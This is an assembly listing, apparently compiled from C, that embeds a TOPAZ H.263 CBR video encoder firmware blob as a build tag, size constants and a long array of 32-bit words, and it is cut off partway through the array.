the_stack_data/192329591.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "TOPAZ_DDKBUILD_00-00-00-0146" .section __DATA,__data .globl _szH263CBR_MTXTOPAZFW_buildtag ; @szH263CBR_MTXTOPAZFW_buildtag .p2align 3 _szH263CBR_MTXTOPAZFW_buildtag: .quad l_.str .globl _ui32H263CBR_MTXTOPAZFWTextSize ; @ui32H263CBR_MTXTOPAZFWTextSize .p2align 2 _ui32H263CBR_MTXTOPAZFWTextSize: .long 4500 ; 0x1194 .globl _ui32H263CBR_MTXTOPAZFWDataSize ; @ui32H263CBR_MTXTOPAZFWDataSize .p2align 2 _ui32H263CBR_MTXTOPAZFWDataSize: .long 3680 ; 0xe60 .globl _ui32H263CBR_MTXTOPAZFWDataLocation ; @ui32H263CBR_MTXTOPAZFWDataLocation .p2align 2 _ui32H263CBR_MTXTOPAZFWDataLocation: .long 2189969024 ; 0x82884680 .globl _aui32H263CBR_MTXTOPAZFWText ; @aui32H263CBR_MTXTOPAZFWText .p2align 2 _aui32H263CBR_MTXTOPAZFWText: .long 2420162561 ; 0x9040c001 .long 3356070910 ; 0xc80993fe .long 3221229122 ; 0xc0000e42 .long 3358133760 ; 0xc8290e00 .long 3306193954 ; 0xc5108422 .long 3358164000 ; 0xc8298420 .long 3295184418 ; 0xc4688622 .long 2659419648 ; 0x9e838600 .long 3356073539 ; 0xc8099e43 .long 3368553794 ; 0xc8c80d42 .long 3356036352 ; 0xc8090d00 .long 3368552770 ; 0xc8c80942 .long 3356035392 ; 0xc8090940 .long 3221884482 ; 0xc00a0e42 .long 3356036672 ; 0xc8090e40 .long 3222177730 ; 0xc00e87c2 .long 2618853328 ; 0x9c1887d0 .long 201459714 ; 0xc020802 .long 159518082 ; 0x9820d82 .long 151129346 ; 0x9020d02 .long 142740610 ; 0x8820c82 .long 2468413438 ; 0x9320fffe .long 2751580216 ; 0xa401c838 .long 230869001 ; 0xdc2c809 .long 230738118 ; 0xdc0c8c6 .long 239257609 ; 0xe42c809 .long 189182080 ; 0xb46b080 .long 2121578367 ; 0x7e74b77f .long 2760706178 ; 0xa48d0882 .long 4294942707 ; 0xffff9ff3 .long 2635305952 ; 0x9d1393e0 .long 4164518017 ; 0xf8398081 .long 117940741 ; 0x707a205 .long 109380359 ; 0x6850307 .long 58957463 ; 0x3839e97 .long 262145551 ; 0xfa0060f .long 26019213 ; 0x18d058d .long 2623668367 ; 0x9c62008f .long 2470510591 ; 0x9340ffff .long 245368331 ; 0xea0060b .long 4294941794 ; 0xffff9c62 .long 93164448 ; 0x58d93a0 .long 3070230925 ; 0xb700018d .long 3078640140 ; 0xb780520c .long 2617332116 ; 0x9c015194 .long 109553157 ; 0x687a605 .long 245368331 ; 0xea0060b .long 4294941794 ; 0xffff9c62 .long 4193817504 ; 0xf9f893a0 .long 4193823389 ; 0xf9f8aa9d .long 2619517469 ; 0x9c22aa1d .long 2785909794 ; 0xa60d9c22 .long 2617180148 ; 0x9bfefff4 .long 211994665 ; 0xca2c829 .long 209765648 ; 0xc80c510 .long 1078834976 ; 0x404db720 .long 172148745 ; 0xa42c809 .long 168871402 ; 0xa10c5ea .long 184710208 ; 0xb027440 .long 1116517760 ; 0x428cb580 .long 169005058 ; 0xa12d002 .long 1178907681 ; 0x4644b421 .long 3226733962 ; 0xc0540d8a .long 3078658224 ; 0xb78098b0 .long 3355923084 ; 0xc807528c .long 3312453826 ; 0xc57008c2 .long 3224504448 ; 0xc0320880 .long 3045067910 ; 0xb5800c86 .long 3022081164 ; 0xb4214c8c .long 168214528 ; 0xa06c000 .long 211337218 ; 0xc98c002 .long 3221271681 ; 0xc000b481 .long 151132676 ; 0x9021a04 .long 146456578 ; 0x8bac002 .long 1081653600 ; 0x4078b960 .long 167821824 ; 0xa00c200 .long 1485558308 ; 0x588bd224 .long 3221271617 ; 0xc000b441 .long 168939008 ; 0xa11ce00 .long 2466381823 ; 0x9301ffff .long 411361280 ; 0x1884e000 .long 2453995519 ; 0x9244ffff .long 172148743 ; 0xa42c807 .long 167822710 ; 0xa00c576 .long 210157618 ; 0xc86c032 .long 3221271681 ; 0xc000b481 .long 142739970 ; 0x8820a02 .long 142870786 ; 0x8840902 .long 1081653600 ; 0x4078b960 .long 167821824 ; 0xa00c200 .long 1485558308 ; 0x588bd224 .long 3221271617 ; 0xc000b441 .long 168939008 ; 0xa11ce00 .long 2466381823 ; 0x9301ffff .long 1952104452 ; 0x745ac004 .long 2453471231 ; 0x923cffff .long 3224635906 ; 0xc0340a02 .long 3028356254 ; 0xb4810c9e .long 3224682496 ; 0xc034c000 .long 3226769613 ; 0xc05498cd .long 3226769454 ; 0xc054982e .long 227186730 ; 0xd8a982a .long 2556543060 ; 0x9861c054 .long 172148737 ; 0xa42c801 .long 168345616 ; 0xa08c010 .long 210157618 ; 0xc86c032 .long 3221271681 ; 0xc000b481 .long 146982913 ; 0x8c2c801 .long 142658320 ; 0x880cb10 .long 3022064868 ; 0xb4210ce4 .long 168214528 ; 0xa06c000 .long 3028356276 ; 0xb4810cb4 .long 3240345600 ; 0xc123c000 .long 3311798482 ; 0xc56608d2 .long 3229616352 ; 0xc08008e0 .long 3022064770 ; 0xb4210c82 .long 436518912 ; 0x1a04c000 .long 3028356228 ; 0xb4810c84 .long 226934784 ; 0xd86c000 .long 218237378 ; 0xd0209c2 .long 151175457 ; 0x902c121 .long 2568732692 ; 0x991bc014 .long 1166849920 ; 0x458cb780 .long 2843931144 ; 0xa982f208 .long 218284065 ; 0xd02c021 .long 163712260 ; 0x9c20d04 .long 2567356436 ; 0x9906c014 .long 1166849920 ; 0x458cb780 .long 181584163 ; 0xad2c123 .long 182502758 ; 0xae0c566 .long 2843931144 ; 0xa982f208 .long 218499522 ; 0xd0609c2 .long 2566570004 ; 0x98fac014 .long 163712390 ; 0x9c20d86 .long 3246460174 ; 0xc1810d0e .long 3222538498 ; 0xc0140902 .long 3221395710 ; 0xc00298fe .long 3226734018 ; 0xc0540dc2 .long 1879742477 ; 0x700a980d .long 2472869887 ; 0x9364ffff .long 3226733954 ; 0xc0540d82 .long 3221461012 ; 0xc0039814 .long 3074462432 ; 0xb74092e0 .long 3525726980 ; 0xd2265304 .long 2653772040 ; 0x9e2d5908 .long 2857230384 ; 0xaa4de030 .long 2623708836 ; 0x9c629ea4 .long 1158985504 ; 0x4514b720 .long 1079883584 ; 0x405db740 .long 1489093248 ; 0x58c1c280 .long 713084912 ; 0x2a80cff0 .long 1512161920 ; 0x5a21c280 .long 2149708560 ; 0x8021f310 .long 1967046660 ; 0x753ec004 .long 1087223072 ; 0x40cdb520 .long 1078834560 ; 0x404db580 .long 1179825201 ; 0x4652b431 .long 172148737 ; 0xa42c801 .long 168345616 ; 0xa08c010 .long 210157618 ; 0xc86c032 .long 3221271681 ; 0xc000b481 .long 3221358726 ; 0xc0020886 .long 3022064792 ; 0xb4210c98 .long 3078668288 ; 0xb780c000 .long 3229631756 ; 0xc080450c .long 4060613762 ; 0xf2080c82 .long 3022104705 ; 0xb421a881 .long 226672640 ; 0xd82c000 .long 2614149172 ; 0x9bd0c034 .long 1158461312 ; 0x450cb780 .long 2827088392 ; 0xa881f208 .long 4294930434 ; 0xffff7002 .long 226923268 ; 0xd869304 .long 218237378 ; 0xd0209c2 .long 151175457 ; 0x902c121 .long 2561654804 ; 0x98afc014 .long 1166849920 ; 0x458cb780 .long 2843931144 ; 0xa982f208 .long 218284065 ; 0xd02c021 .long 163712260 ; 0x9c20d04 .long 2560278548 ; 0x989ac014 .long 1166849920 ; 0x458cb780 .long 2843931144 ; 0xa982f208 .long 218499522 ; 0xd0609c2 .long 2559754260 ; 0x9892c014 .long 163712390 ; 0x9c20d86 .long 3238071566 ; 0xc1010d0e .long 3222538498 ; 0xc0140902 .long 2000722070 ; 0x77409896 .long 2424487936 ; 0x9082c000 .long 2608447540 ; 0x9b79c034 .long 2625685873 ; 0x9c80c971 .long 1514267136 ; 0x5a41e200 .long 2449784832 ; 0x9204c000 .long 230866946 ; 0xdc2c002 .long 2610610228 ; 0x9b9ac034 .long 1158461312 ; 0x450cb780 .long 2827088392 ; 0xa881f208 .long 4294930434 ; 0xffff7002 .long 226661092 ; 0xd8292e4 .long 2610806836 ; 0x9b9dc034 .long 3221255552 ; 0xc0007580 .long 3224671076 ; 0xc0349364 .long 227187550 ; 0xd8a9b5e .long 2610282548 ; 0x9b95c034 .long 1158461312 ; 0x450cb780 .long 2827088392 ; 0xa881f208 .long 1493749928 ; 0x5908d0a8 .long 155766899 ; 0x948d073 .long 3761282605 ; 0xe0309e2d .long 3555830477 ; 0xd3f1aacd .long 3254790748 ; 0xc2002a5c .long 1964530181 ; 0x75185a05 .long 718458898 ; 0x2ad2d012 .long 2452946939 ; 0x9234fffb .long 3080652802 ; 0xb79f0802 .long 3082780398 ; 0xb7bf7eee .long 3084877678 ; 0xb7df7f6e .long 2355134446 ; 0x8c607fee .long 2619513890 ; 0x9c229c22 .long 1159509824 ; 0x451cb740 .long 3254823489 ; 0xc200aa41 .long 3221379592 ; 0xc0025a08 .long 4077914624 ; 0xf3100a00 .long 4060643361 ; 0xf2088021 .long 4060653698 ; 0xf208a882 .long 3233851525 ; 0xc0c0a885 .long 1552485504 ; 0x5c890c80 .long 3221271585 ; 0xc000b421 .long 2785385506 ; 0xa6059c22 .long 1159509824 ; 0x451cb740 .long 143043137 ; 0x886aa41 .long 211730484 ; 0xc9ec034 .long 1510523392 ; 0x5a08c200 .long 167821314 ; 0xa00c002 .long 2158097168 ; 0x80a1f310 .long 3221271585 ; 0xc000b421 .long 210944128 ; 0xc92c080 .long 2854613512 ; 0xaa25f208 .long 3221271681 ; 0xc000b481 .long 3224636866 ; 0xc0340dc2 .long 4060650303 ; 0xf2089b3f .long 1879616037 ; 0x7008aa25 .long 2470772735 ; 0x9344ffff .long 3229616642 ; 0xc0800a02 .long 3028356246 ; 0xb4810c96 .long 226934784 ; 0xd86c000 .long 218499522 ; 0xd0609c2 .long 151175457 ; 0x902c121 .long 2551955476 ; 0x981bc014 .long 2846028296 ; 0xa9a2f208 .long 218284065 ; 0xd02c021 .long 163712260 ; 0x9c20d04 .long 2550710292 ; 0x9808c014 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 3225460308 ; 0xc0409e54 .long 2656636034 ; 0x9e590c82 .long 3221271585 ; 0xc000b421 .long 218284096 ; 0xd02c040 .long 3221271682 ; 0xc000b482 .long 3222182946 ; 0xc00e9c22 .long 3222154620 ; 0xc00e2d7c .long 1563437536 ; 0x5d3029e0 .long 3225460308 ; 0xc0409e54 .long 834145410 ; 0x31b80c82 .long 3221271649 ; 0xc000b461 .long 218284096 ; 0xd02c040 .long 3221271618 ; 0xc000b442 .long 2655820834 ; 0x9e4c9c22 .long 687652878 ; 0x28fcc00e .long 712818702 ; 0x2a7cc00e .long 209895488 ; 0xc82c040 .long 3020004952 ; 0xb4019e58 .long 3254829056 ; 0xc200c000 .long 1491360364 ; 0x58e45a6c .long 486814274 ; 0x1d043242 .long 2656132368 ; 0x9e515d10 .long 428104077 ; 0x1984598d .long 964739089 ; 0x3980c011 .long 1494037062 ; 0x590d3246 .long 1496324356 ; 0x59301904 .long 843330114 ; 0x32443242 .long 3221271681 ; 0xc000b481 .long 2655820834 ; 0x9e4c9c22 .long 687652878 ; 0x28fcc00e .long 712818702 ; 0x2a7cc00e .long 209895488 ; 0xc82c040 .long 3020004952 ; 0xb4019e58 .long 3254829056 ; 0xc200c000 .long 1491360364 ; 0x58e45a6c .long 486814274 ; 0x1d043242 .long 2656132368 ; 0x9e515d10 .long 428104077 ; 0x1984598d .long 964739097 ; 0x3980c019 .long 1494037062 ; 0x590d3246 .long 1496324356 ; 0x59301904 .long 843330114 ; 0x32443242 .long 3221271681 ; 0xc000b481 .long 2655820834 ; 0x9e4c9c22 .long 687652878 ; 0x28fcc00e .long 712818702 ; 0x2a7cc00e .long 209895488 ; 0xc82c040 .long 3020004952 ; 0xb4019e58 .long 3254829056 ; 0xc200c000 .long 1491360364 ; 0x58e45a6c .long 486814274 ; 0x1d043242 .long 2656132368 ; 0x9e515d10 .long 428104077 ; 0x1984598d .long 964739101 ; 0x3980c01d .long 1494037062 ; 0x590d3246 .long 1496324356 ; 0x59301904 .long 843330114 ; 0x32443242 .long 3221271681 ; 0xc000b481 .long 2785909794 ; 0xa60d9c22 .long 117670944 ; 0x7038420 .long 3263170183 ; 0xc2800687 .long 478436493 ; 0x1c845c8d .long 1554043042 ; 0x5ca0d0a2 .long 3490775687 ; 0xd0110287 .long 3254782558 ; 0xc2000a5e .long 436492813 ; 0x1a045a0d .long 1513144832 ; 0x5a30c200 .long 815291600 ; 0x30985cd0 .long 67477068 ; 0x4059e4c .long 210419762 ; 0xc8ac032 .long 3355521176 ; 0xc8013098 .long 3022076032 ; 0xb4213880 .long 2661924864 ; 0x9ea9c000 .long 167954433 ; 0xa02c801 .long 167821314 ; 0xa00c002 .long 3224397139 ; 0xc0306553 .long 3028356234 ; 0xb4810c8a .long 3221405696 ; 0xc002c000 .long 209979522 ; 0xc840882 .long 3221271585 ; 0xc000b421 .long 3491929747 ; 0xd0229e93 .long 2656263945 ; 0x9e535f09 .long 486825229 ; 0x1d045d0d .long 2606432244 ; 0x9b5afff4 .long 1586610816 ; 0x5e91c280 .long 3263176324 ; 0xc2801e84 .long 2657902212 ; 0x9e6c5e84 .long 3263175300 ; 0xc2801a84 .long 3246480016 ; 0xc1815a90 .long 227162752 ; 0xd8a3a80 .long 218237314 ; 0xd020982 .long 4294193482 ; 0xfff4314a .long 3233848148 ; 0xc0c09b54 .long 160566658 ; 0x9920d82 .long 218284034 ; 0xd02c002 .long 151175170 ; 0x902c002 .long 2588393524 ; 0x9a47c034 .long 3224635914 ; 0xc0340a0a .long 3028356254 ; 0xb4810c9e .long 453296128 ; 0x1b04c000 .long 2231530943 ; 0x850275bf .long 2449653760 ; 0x9202c000 .long 3042942415 ; 0xb55f9dcf .long 3224665980 ; 0xc0347f7c .long 4063337039 ; 0xf2319a4f .long 3076497477 ; 0xb75fa045 .long 453279612 ; 0x1b047f7c .long 2232448447 ; 0x851075bf .long 2458189823 ; 0x9284ffff .long 3224373762 ; 0xc0300a02 .long 3028356238 ; 0xb4810c8e .long 3080699904 ; 0xb79fc000 .long 3082780270 ; 0xb7bf7e6e .long 3084877550 ; 0xb7df7eee .long 3221389166 ; 0xc0027f6e .long 2619509760 ; 0x9c228c00 .long 3078661637 ; 0xb780a605 .long 3221504908 ; 0xc004438c .long 1962945024 ; 0x75002a00 .long 1510782880 ; 0x5a0cb7a0 .long 2462236674 ; 0x92c2c002 .long 2847339016 ; 0xa9b6f208 .long 159563856 ; 0x982c050 .long 226410504 ; 0xd7ec008 .long 2601058292 ; 0x9b08fff4 .long 2847863304 ; 0xa9bef208 .long 159563816 ; 0x982c028 .long 222216196 ; 0xd3ec004 .long 2600534004 ; 0x9b00fff4 .long 1133295488 ; 0x438cb780 .long 952160785 ; 0x38c0d211 .long 33791625 ; 0x2039e89 .long 704692737 ; 0x2a00c201 .long 3489297664 ; 0xcffa7500 .long 3038784765 ; 0xb5202cfd .long 3221308308 ; 0xc0014394 .long 1950388450 ; 0x744090e2 .long 1519171392 ; 0x5a8cb740 .long 2455158784 ; 0x9256c000 .long 2856710152 ; 0xaa45f008 .long 2831806472 ; 0xa8c9f008 .long 754894847 ; 0x2cfec7ff .long 167821328 ; 0xa00c010 .long 2722492424 ; 0xa245f008 .long 142655496 ; 0x880c008 .long 2697588744 ; 0xa0c9f008 .long 1133819168 ; 0x4394b520 .long 2856710152 ; 0xaa45f008 .long 1133295392 ; 0x438cb720 .long 2721444360 ; 0xa235f208 .long 2831872008 ; 0xa8caf008 .long 687787519 ; 0x28fecdff .long 2696868360 ; 0xa0bef208 .long 1133294880 ; 0x438cb520 .long 2453716992 ; 0x9240c000 .long 2839015944 ; 0xa937f208 .long 2855924232 ; 0xaa39f208 .long 2839343626 ; 0xa93cf20a .long 2829185608 ; 0xa8a1f248 .long 2149708560 ; 0x8021f310 .long 2191778320 ; 0x82a3e210 .long 2721444360 ; 0xa235f208 .long 2696802824 ; 0xa0bdf208 .long 2847863368 ; 0xa9bef248 .long 159563778 ; 0x982c002 .long 4294184206 ; 0xfff40d0e .long 4064844469 ; 0xf2489ab5 .long 3072371261 ; 0xb720aa3d .long 3221373836 ; 0xc002438c .long 4064807424 ; 0xf2480a00 .long 3254821437 ; 0xc200a23d .long 3038787712 ; 0xb5203880 .long 3222356876 ; 0xc011438c .long 1950361728 ; 0x74402880 .long 2464333824 ; 0x92e2c000 .long 2847339080 ; 0xa9b6f248 .long 159563784 ; 0x982c008 .long 4294184254 ; 0xfff40d3e .long 4064844445 ; 0xf2489a9d .long 3072371253 ; 0xb720aa35 .long 3221767052 ; 0xc008438c .long 4064807424 ; 0xf2480a00 .long 3229721141 ; 0xc081a235 .long 3488561280 ; 0xcfef3880 .long 3038783742 ; 0xb52028fe .long 3078636428 ; 0xb780438c .long 3221308300 ; 0xc001438c .long 1962945028 ; 0x75002a04 .long 2464333824 ; 0x92e2c000 .long 2847339080 ; 0xa9b6f248 .long 159563784 ; 0x982c008 .long 4294184254 ; 0xfff40d3e .long 4064844417 ; 0xf2489a81 .long 3072371253 ; 0xb720aa35 .long 3221767052 ; 0xc008438c .long 4064807424 ; 0xf2480a00 .long 3221332533 ; 0xc001a235 .long 3489609864 ; 0xcfff3888 .long 3038783738 ; 0xb52028fa .long 3072344972 ; 0xb720438c .long 33768332 ; 0x203438c .long 705740801 ; 0x2a10c001 .long 3221386496 ; 0xc0027500 .long 3221328002 ; 0xc0019082 .long 1950361792 ; 0x744028c0 .long 2441265153 ; 0x9182c001 .long 2846290568 ; 0xa9a6f288 .long 218499522 ; 0xd0609c2 .long 209848642 ; 0xc820942 .long 4294183042 ; 0xfff40882 .long 4069038742 ; 0xf2889a96 .long 4069042614 ; 0xf288a9b6 .long 1569761575 ; 0x5d90a927 .long 2175787552 ; 0x81afe220 .long 1133295488 ; 0x438cb780 .long 218499522 ; 0xd0609c2 .long 209848642 ; 0xc820942 .long 3221293186 ; 0xc0010882 .long 3045079584 ; 0xb5803a20 .long 4294198156 ; 0xfff4438c .long 3078658720 ; 0xb7809aa0 .long 4069016460 ; 0xf288438c .long 3221465253 ; 0xc003a8a5 .long 146815488 ; 0x8c03a00 .long 2695230088 ; 0xa0a5f288 .long 707710975 ; 0x2a2ecfff .long 2455814144 ; 0x9260c000 .long 2846290568 ; 0xa9a6f288 .long 218499522 ; 0xd0609c2 .long 2587295732 ; 0x9a36fff4 .long 1133295488 ; 0x438cb780 .long 2829447816 ; 0xa8a5f288 .long 975224833 ; 0x3a20c001 .long 4069001408 ; 0xf28808c0 .long 3489636517 ; 0xcfffa0a5 .long 3045075566 ; 0xb5802a6e .long 3080668044 ; 0xb79f438c .long 3082780526 ; 0xb7bf7f6e .long 2353037294 ; 0x8c407fee .long 2785385506 ; 0xa6059c22 .long 1133295488 ; 0x438cb780 .long 704692736 ; 0x2a00c200 .long 2656924928 ; 0x9e5d7500 .long 2466430976 ; 0x9302c000 .long 180120206 ; 0xabc6a8e .long 159555243 ; 0x9829eab .long 3238071606 ; 0xc1010d36 .long 3222538498 ; 0xc0140902 .long 2662045860 ; 0x9eab98a4 .long 1133295488 ; 0x438cb780 .long 219810178 ; 0xd1a0982 .long 151175425 ; 0x902c101 .long 712887806 ; 0x2a7dcdfe .long 1133294976 ; 0x438cb580 .long 2560081940 ; 0x9897c014 .long 1133295488 ; 0x438cb780 .long 704692353 ; 0x2a00c081 .long 3221255424 ; 0xc0007500 .long 3238105634 ; 0xc1019222 .long 3221620994 ; 0xc0060902 .long 231606592 ; 0xdce0940 .long 218237314 ; 0xd020982 .long 2559033364 ; 0x9887c014 .long 1133295488 ; 0x438cb780 .long 712953727 ; 0x2a7ecf7f .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 705216513 ; 0x2a08c001 .long 3221255424 ; 0xc0007500 .long 3238105634 ; 0xc1019222 .long 3221620994 ; 0xc0060902 .long 232655168 ; 0xdde0940 .long 218237314 ; 0xd020982 .long 2557591572 ; 0x9871c014 .long 1133295488 ; 0x438cb780 .long 712429567 ; 0x2a76cfff .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 706789377 ; 0x2a20c001 .long 3221255424 ; 0xc0007500 .long 232952290 ; 0xde291e2 .long 218237314 ; 0xd020982 .long 151175425 ; 0x902c101 .long 2556280852 ; 0x985dc014 .long 1133295488 ; 0x438cb780 .long 710856703 ; 0x2a5ecfff .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 704692227 ; 0x2a00c003 .long 3221255424 ; 0xc0007500 .long 232952290 ; 0xde291e2 .long 218499458 ; 0xd060982 .long 151175425 ; 0x902c101 .long 2554970132 ; 0x9849c014 .long 1133295488 ; 0x438cb780 .long 712953853 ; 0x2a7ecffd .long 1133294976 ; 0x438cb580 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 3080758789 ; 0xb7a0a605 .long 4064827916 ; 0xf2485a0c .long 3223431610 ; 0xc021a9ba .long 222039298 ; 0xd3c0d02 .long 159563784 ; 0x982c008 .long 2577334260 ; 0x999efff4 .long 2846552712 ; 0xa9aaf288 .long 218284065 ; 0xd02c021 .long 163712260 ; 0x9c20d04 .long 2576809972 ; 0x9996fff4 .long 2855924296 ; 0xaa39f248 .long 2829709960 ; 0xa8a9f288 .long 167821320 ; 0xa00c008 .long 2721706568 ; 0xa239f248 .long 4069001408 ; 0xf28808c0 .long 3080691881 ; 0xb79fa0a9 .long 3082780526 ; 0xb7bf7f6e .long 2353037294 ; 0x8c407fee .long 2785385506 ; 0xa6059c22 .long 160564871 ; 0x9920687 .long 218284034 ; 0xd02c002 .long 151175170 ; 0x902c002 .long 2558771252 ; 0x9883c034 .long 172146690 ; 0xa42c002 .long 3263172272 ; 0xc2800eb0 .long 3028639369 ; 0xb4855e89 .long 3080699904 ; 0xb79fc000 .long 3082780526 ; 0xb7bf7f6e .long 2353037294 ; 0x8c407fee .long 3074464802 ; 0xb7409c22 .long 3517336708 ; 0xd1a64c84 .long 2653773064 ; 0x9e2d5d08 .long 2832064560 ; 0xa8cde030 .long 1510785152 ; 0x5a0cc080 .long 3522386053 ; 0xd1f35885 .long 3222153488 ; 0xc00e2910 .long 3793759612 ; 0xe2202d7c .long 3222176045 ; 0xc00e812d .long 1563437632 ; 0x5d302a40 .long 843226705 ; 0x32429e51 .long 209895488 ; 0xc82c040 .long 3221271681 ; 0xc000b481 .long 218284096 ; 0xd02c040 .long 3221271618 ; 0xc000b442 .long 3074464802 ; 0xb7409c22 .long 502291204 ; 0x1df05b04 .long 1560859046 ; 0x5d08d1a6 .long 3761282605 ; 0xe0309e2d .long 3229657293 ; 0xc080a8cd .long 3493026309 ; 0xd0335a05 .long 1502685518 ; 0x5991294e .long 8989116 ; 0x8929bc .long 2175263248 ; 0x81a7e210 .long 688968179 ; 0x2910d1f3 .long 763150350 ; 0x2d7cc00e .long 2167267872 ; 0x812de220 .long 1563449744 ; 0x5d305990 .long 834182740 ; 0x31b89e54 .long 209895488 ; 0xc82c040 .long 3221271649 ; 0xc000b461 .long 218284096 ; 0xd02c040 .long 3221271618 ; 0xc000b442 .long 2785385506 ; 0xa6059c22 .long 1510782880 ; 0x5a0cb7a0 .long 243450129 ; 0xe82c111 .long 247513166 ; 0xec0c04e .long 2847339016 ; 0xa9b6f208 .long 159563856 ; 0x982c050 .long 226410504 ; 0xd7ec008 .long 2568945652 ; 0x991efff4 .long 234004074 ; 0xdf29e6a .long 159563780 ; 0x982c004 .long 4294184194 ; 0xfff40d02 .long 4060650440 ; 0xf2089bc8 .long 4064848183 ; 0xf248a937 .long 3793791402 ; 0xe220a9aa .long 3226501551 ; 0xc05081af .long 3221752194 ; 0xc0080982 .long 4294184318 ; 0xfff40d7e .long 2657786123 ; 0x9e6a990b .long 3221491186 ; 0xc0040df2 .long 218237378 ; 0xd0209c2 .long 2612396020 ; 0x9bb5fff4 .long 2839015944 ; 0xa937f208 .long 2846552648 ; 0xa9aaf248 .long 2167325185 ; 0x812ec201 .long 2175787552 ; 0x81afe220 .long 159563856 ; 0x982c050 .long 226410504 ; 0xd7ec008 .long 2566324212 ; 0x98f6fff4 .long 234004074 ; 0xdf29e6a .long 159563782 ; 0x982c006 .long 4294184194 ; 0xfff40d02 .long 4060650400 ; 0xf2089ba0 .long 3487082942 ; 0xcfd8a9be .long 3223850625 ; 0xc0280e81 .long 3221490050 ; 0xc0040982 .long 4294184254 ; 0xfff40d3e .long 2657786085 ; 0x9e6a98e5 .long 3221491186 ; 0xc0040df2 .long 3221490050 ; 0xc0040982 .long 4294184258 ; 0xfff40d42 .long 4060650382 ; 0xf2089b8e .long 4064848191 ; 0xf248a93f .long 3793791410 ; 0xe220a9b2 .long 3223880111 ; 0xc02881af .long 3221490050 ; 0xc0040982 .long 4294184254 ; 0xfff40d3e .long 2657786065 ; 0x9e6a98d1 .long 3221491186 ; 0xc0040df2 .long 3221490114 ; 0xc00409c2 .long 4294184258 ; 0xfff40d42 .long 4060650362 ; 0xf2089b7a .long 4064848191 ; 0xf248a93f .long 3254888882 ; 0xc201a9b2 .long 3793781038 ; 0xe220812e .long 3223880111 ; 0xc02881af .long 3221490050 ; 0xc0040982 .long 4294184254 ; 0xfff40d3e .long 2657786043 ; 0x9e6a98bb .long 3221622258 ; 0xc0060df2 .long 3221490050 ; 0xc0040982 .long 4294184258 ; 0xfff40d42 .long 4064844644 ; 0xf2489b64 .long 4060785193 ; 0xf20aaa29 .long 4064848180 ; 0xf248a934 .long 3525748913 ; 0xd226a8b1 .long 4060633348 ; 0xf2085904 .long 4077955519 ; 0xf310a9bf .long 3500572705 ; 0xd0a68021 .long 3792722180 ; 0xe2105904 .long 4077944995 ; 0xf31080a3 .long 3792732705 ; 0xe2108221 .long 4060643507 ; 0xf20880b3 .long 4060652085 ; 0xf208a235 .long 3080691901 ; 0xb79fa0bd .long 3082780526 ; 0xb7bf7f6e .long 2353037294 ; 0x8c407fee .long 2785385506 ; 0xa6059c22 .long 151175457 ; 0x902c121 .long 155238406 ; 0x940c006 .long 42405322 ; 0x2870dca .long 218237314 ; 0xd020982 .long 721207310 ; 0x2afcc00e .long 2602303476 ; 0x9b1bfff4 .long 159518154 ; 0x9820dca .long 3263171870 ; 0xc2800d1e .long 17521388 ; 0x10b5aec .long 956350753 ; 0x3900c121 .long 2601648116 ; 0x9b11fff4 .long 1133295488 ; 0x438cb780 .long 973128704 ; 0x3a00c400 .long 1133294976 ; 0x438cb580 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 153274409 ; 0x922c829 .long 158385662 ; 0x970c5fe .long 170051625 ; 0xa22c829 .long 173065726 ; 0xa50c5fe .long 1535948576 ; 0x5b8cb720 .long 211994665 ; 0xca2c829 .long 216057342 ; 0xce0c5fe .long 2231549956 ; 0x8502c004 .long 1166849408 ; 0x458cb580 .long 1158460704 ; 0x450cb520 .long 169398385 ; 0xa18d071 .long 2722230280 ; 0xa241f008 .long 1078834464 ; 0x404db520 .long 1094563136 ; 0x413db540 .long 2365636612 ; 0x8d00c004 .long 1086174528 ; 0x40bdb540 .long 1077785920 ; 0x403db540 .long 4164525090 ; 0xf8399c22 .long 4027622021 ; 0xf010a285 .long 1962977889 ; 0x7500aa61 .long 2439299072 ; 0x9164c000 .long 2831273992 ; 0xa8c1d008 .long 168205896 ; 0xa069e48 .long 1375781376 ; 0x5200c200 .long 3490197656 ; 0xd0083098 .long 3490816193 ; 0xd011a0c1 .long 3490712888 ; 0xd0100d38 .long 4027689458 ; 0xf011a9f2 .long 4027587120 ; 0xf0101a30 .long 428124483 ; 0x1984a943 .long 2481111040 ; 0x93e2c000 .long 2265108465 ; 0x8702cff1 .long 2264977392 ; 0x8700cff0 .long 142524431 ; 0x87ec00f .long 142393358 ; 0x87cc00e .long 203079760 ; 0xc1ac050 .long 2831544361 ; 0xa8c5f029 .long 546689056 ; 0x2095d020 .long 2655870113 ; 0x9e4d5ca1 .long 3254788624 ; 0xc2002210 .long 819485216 ; 0x30d85a20 .long 1074182665 ; 0x4006ba09 .long 3221271584 ; 0xc000b420 .long 439414801 ; 0x1a30f011 .long 4294908292 ; 0xffff1984 .long 4061172196 ; 0xf21091e4 .long 4027613231 ; 0xf010802f .long 4193821249 ; 0xf9f8a241 .long 2619517597 ; 0x9c22aa9d .long 2216732173 ; 0x8420a60d .long 2656404738 ; 0x9e558502 .long 2138879327 ; 0x7f7cb55f .long 2858545168 ; 0xaa61f010 .long 2374950930 ; 0x8d8ee012 .long 3042902791 ; 0xb55f0307 .long 436764668 ; 0x1a087ffc .long 3525735690 ; 0xd226750a .long 2235586828 ; 0x8540590c .long 2151997530 ; 0x8044e05a .long 2447425539 ; 0x91e0c003 .long 2441134080 ; 0x9180c000 .long 2415968257 ; 0x9000c001 .long 2436939777 ; 0x9140c001 .long 2460008449 ; 0x92a0c001 .long 2474688513 ; 0x9380c001 .long 2445328386 ; 0x91c0c002 .long 1552725888 ; 0x5c8cb780 .long 2827082248 ; 0xa881da08 .long 1950361736 ; 0x74402888 .long 3008529770 ; 0xb352856a .long 3078636642 ; 0xb7804462 .long 2639742220 ; 0x9d57450c .long 2374557713 ; 0x8d88e011 .long 424988786 ; 0x1954d072 .long 2727997960 ; 0xa299f208 .long 2596061204 ; 